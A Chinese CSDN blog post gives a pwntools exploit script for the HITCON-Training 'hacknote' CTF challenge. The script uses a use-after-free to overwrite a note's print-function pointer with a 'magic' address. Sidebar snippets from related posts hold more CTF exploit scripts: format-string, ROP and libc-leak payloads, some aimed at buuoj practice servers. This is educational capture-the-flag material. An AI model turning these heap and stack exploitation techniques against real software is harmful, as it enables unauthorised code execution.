hitcontraining hacknote

最新推荐文章于 2024-09-03 21:45:29 发布
最新推荐文章于 2024-09-03 21:45:29 发布
阅读量151 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/pondzhang/article/details/106221414
本文通过具体示例,深入解析了Hacknote程序中的漏洞利用技巧。利用Python的pwntools库,演示了如何通过添加、删除和打印笔记来控制程序流程,最终实现任意代码执行。文章详细介绍了每个步骤的技术细节,包括创建大小为16的笔记两次,删除这两个笔记,然后添加包含magic地址的笔记,最后打印笔记以触发漏洞。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

from pwn import *
p = process('./hacknote')
def add(size, content):
    p.sendlineafter('Your choice :', '1')
    p.sendlineafter('Note size :', str(size))
    p.sendlineafter('Content :', content)
def delete(idx):
    p.sendlineafter('Your choice :', '2')
    p.sendlineafter('Index :', str(idx))
def prints(idx):
    p.sendlineafter('Your choice :', '3')
    p.sendlineafter('Index :', str(idx))
magic = 0x08048945
add(16, '')
add(16, '')
delete(0)
delete(1)
add(4, p32(magic))
prints(0)
p.interactive()
BUUCTF hitcontraining_uaf
BengDouLove的博客
04-09 1016
这是我第一次自己做出来的堆题,,????动 没什么特别,,看一看代码 还是一个堆块管理系统,不过这次他管理的时候有些不一样 1.add 不一样就在这里,,如果要创建一个用户数据,,先malloc一个八字节的指针堆块(我这么叫。。里面放着指针),,这八字节,前四个字节是一个pirnt_note_content函数,,这个函数的作用是以他后面相邻四个字节的数据为指针,打印这个指针里面的内容;;;申请...
BUUOJ PWN 61-80
2h4ox1n9
12-17 352
61\
hitcon-training lab10 - hacknote 做题笔记
fa1c4的blog
08-19 738
前言 hitcon-training lab10 堆利用例题 hacknote 过程 直接看源码 #include <stdio.h> #include <unistd.h> #include <stdlib.h> struct note { void (*printnote)(); char *content ; }; struct note *notelist[5]; int count = 0; void print_note_content(stru
HITCON-training lab 10 hacknote题解
coco的博客
11-19 798
基本信息 首先,我们通过checksec来查看程序的基本信息和开启的防护。该程序是一个32位程序,并且开启了canary和nx。 运行程序之后发现是一个菜单类型的程序。 静态分析 add note函数 首先申请了一个8字节的chunk,其指针记录在bss段上。这个8字节的内容是一个结构体 struct node { 指向print note content函数的指针 指向content的指针...
use after free HITCON-training (lab 10 hacknote)
九层台
08-06 919
liu@liu-F117-F:~/1t/u18/文档/堆溢出学习/use after free$ checksec hacknote [*] '/home/liu/1t/u18/\xe6\x96\x87\xe6\xa1\xa3/\xe5\xa0\x86\xe6\xba\xa2\xe5\x87\xba\xe5\xad\xa6\xe4\xb9\xa0/use after free/hacknote' ...
pwnable.tw之hacknote
qq_35429581的博客
10-13 2990
uaf漏洞产生的主要原因是释放了一个堆块后,并没有将该指针置为NULL,这样导致该指针处于悬空的状态(有的地方翻译为迷途指针),同样被释放的内存如果被恶意构造数据,就有可能会被利用。 再怎么表述起始还不如真的拿一道题自己调自己看内存看堆状态来的好理解。这也是我觉得ctf-pwn的意义所在,可以把一些漏洞抽象出来以题的形式,作为学习这方面的一个抓手。 此篇尽量做的细致基础,但仍然假设读者已经初步
SUCTF2019 SignIn RSA逆向
pondzhang的专栏
05-15 439
import gmpy2 p=282164587459512124844245113950593348271 q=366669102002966856876605669837014229419 e=65537 c=0xad939ff59f6e70bcbfad406f2494993757eee98b91bc244184a377520d06fc35 n=p*q phin=(p-1)*(q-1) d=gmpy2.invert(e,phin) m=pow(c,d,n) print hex(m)[2:].decode
hitcontraining_uaf
最新发布
m0_73743784的博客
09-03 684
比较经典的 UAF 利用。
buu|hitcontraining_uaf 1
m0_64236521的博客
07-09 226
hitcontraining_uaf 1 这里一次会申请两个堆,其中第一个堆放着print_note_content 前4个字节位是print_note_content函数地址,这个堆块儿存在了notelist中 在执行print_notet时,会调用notelist里存储print_note_content函数地址的堆块儿,及我们只需将notelist里堆块儿存的print_note_content函数地址改成后门函数地址即可 申请两个堆块儿 释放掉 0x10里有两个堆,都是之前存...
2021-09-20 BUUCTF WriteUP(堆/字符串/栈)
m0_56897090的博客
09-20 751
文章目录堆类综合模型总结pwnable_hacknote分析EXPhitcontraining_bamboobox分析EXPnpuctf_2020_easyheap分析EXPciscn_2019_es_1分析EXPhitcontraining_unlink分析EXPgyctf_2020_some_thing_exceting分析EXP栈溢出综合模型总结picoctf_2018_shellcode分析EXPjarvisoj_level5分析EXPcmcc_pwnme2分析EXPactf_2019_babyst
【CTF题解NO.00004】BUUCTF/BUUOJ - Pwn write up by arttnb3
arttnba3的博客
11-20 1566
GITHUB BLOG LINK THERE 文章目录[GITHUB BLOG LINK THERE](https://archive.next.arttnba3.cn/2020/09/08/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x04%E3%80%91BUUOJ-Pwn-write-up-by-arttnb3/)0x000.绪论0x001.test your nc - nc0x002.rip - ret2text0x003.warmup_csaw_2016 - ret2text0
[第五空间2019 决赛]PWN5
pondzhang的专栏
04-27 841
from pwn import * #p = process('./pwn') p = remote("node3.buuoj.cn",25955) addr_unk_804C044 = 0x0804C044 payload = fmtstr_payload(10,{addr_unk_804C044:0x01}) p.sendlineafter('your name:',payload) p.se...
buuoj BJDCTF 2nd r2t3
pondzhang的专栏
03-26 748
buf定义长度为0x400。而buf的长度为0x408 所以不存在溢出。 可见name_check函数存在安全漏洞,但是要绕过长度限制。unsigned __int8 v3定义的数据类型实际为unsigned char。仅有1个字节,超过1个字节数据丢弃,也就是最大数值为0xff ,也就是0x100=256=0,那么可以用0x104至0x107来满足上面的条件。即为传说中的整形溢出...
ZJCTF 2019 Login
pondzhang的专栏
05-19 707
from pwn import * p = process('./login') p.sendlineafter("username: ","admin") payload = "2jctf_pa5sw0rd" + '\x00'*58 + p64(0x0000000000400E88) p.sendlineafter("password: ",payload) p.interactive()
buuoj BJDCTF 2nd one_gadget
pondzhang的专栏
03-25 657
程序输出printf函数地址 可以利用工具one_gadget计算libc基址 from pwn import * #p = process('./one_gadget') p = remote("node3.buuoj.cn",26742) out = p.recv() addr = int(out[out.find('0x')+2:out.find('0x')+14],16) ...
铁人三项(第五赛区)2018 rop
pondzhang的专栏
05-09 573
from pwn import * p = process('./2018_rop') gotwrite = 0x0804A010 pltwrite = 0x080483A0 start = 0x080483C0 bss = 0x0804A020 pltread = 0x08048360 def leak(address): payload = 'a' * 140 + p32(pltwrite) + p32(start) + p32(0x01) + p32(address) + p32(0x04
GKCTF2021 checkin
pondzhang的专栏
06-27 573
from pwn import * context.log_level='debug' p = process('./login') elf = ELF('./login') libc = elf.libc puts_func = 0x00000000004018B5 puts_got = 0x0000000000602028 pop_rdi_ret = 0x0000000000401ab3 main = 0x0000000000401A2A bss = 0x0000000000602400 p.recv.
ciscn2019 pwn3
pondzhang的专栏
05-26 459
from pwn import * p = process("./ciscn_2019_n_3") elf = ELF('./ciscn_2019_n_3') def do_new_text(idx, lens, content): p.sendlineafter("CNote > ", '1') p.sendlineafter("Index > ", str(idx)) p.sendlineafter("Type > ", '2') p.sendlin
bjdctf2020 babystack
pondzhang的专栏
05-08 402
from pwn import * p = process('./bjdctf_2020_babystack') p.recvuntil("length of your name:\n") p.sendline('1024') p.recvuntil("What's u name?\n") payload = 'a'*12 + p32(1024) + 'a'*8 + p64(0x000000000...
pwnable_start
pondzhang的专栏
03-13 396
from pwn import * loacl_elf = ELF("./start") context.arch = loacl_elf.arch #p = process("./start") p = remote("node3.buuoj.cn",28802) #gdb.attach(p, 'b* 0x08048060') #shellcode=asm(shellcraft.sh()) shellcode = asm("xor ecx,ecx;\ xor edx,.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值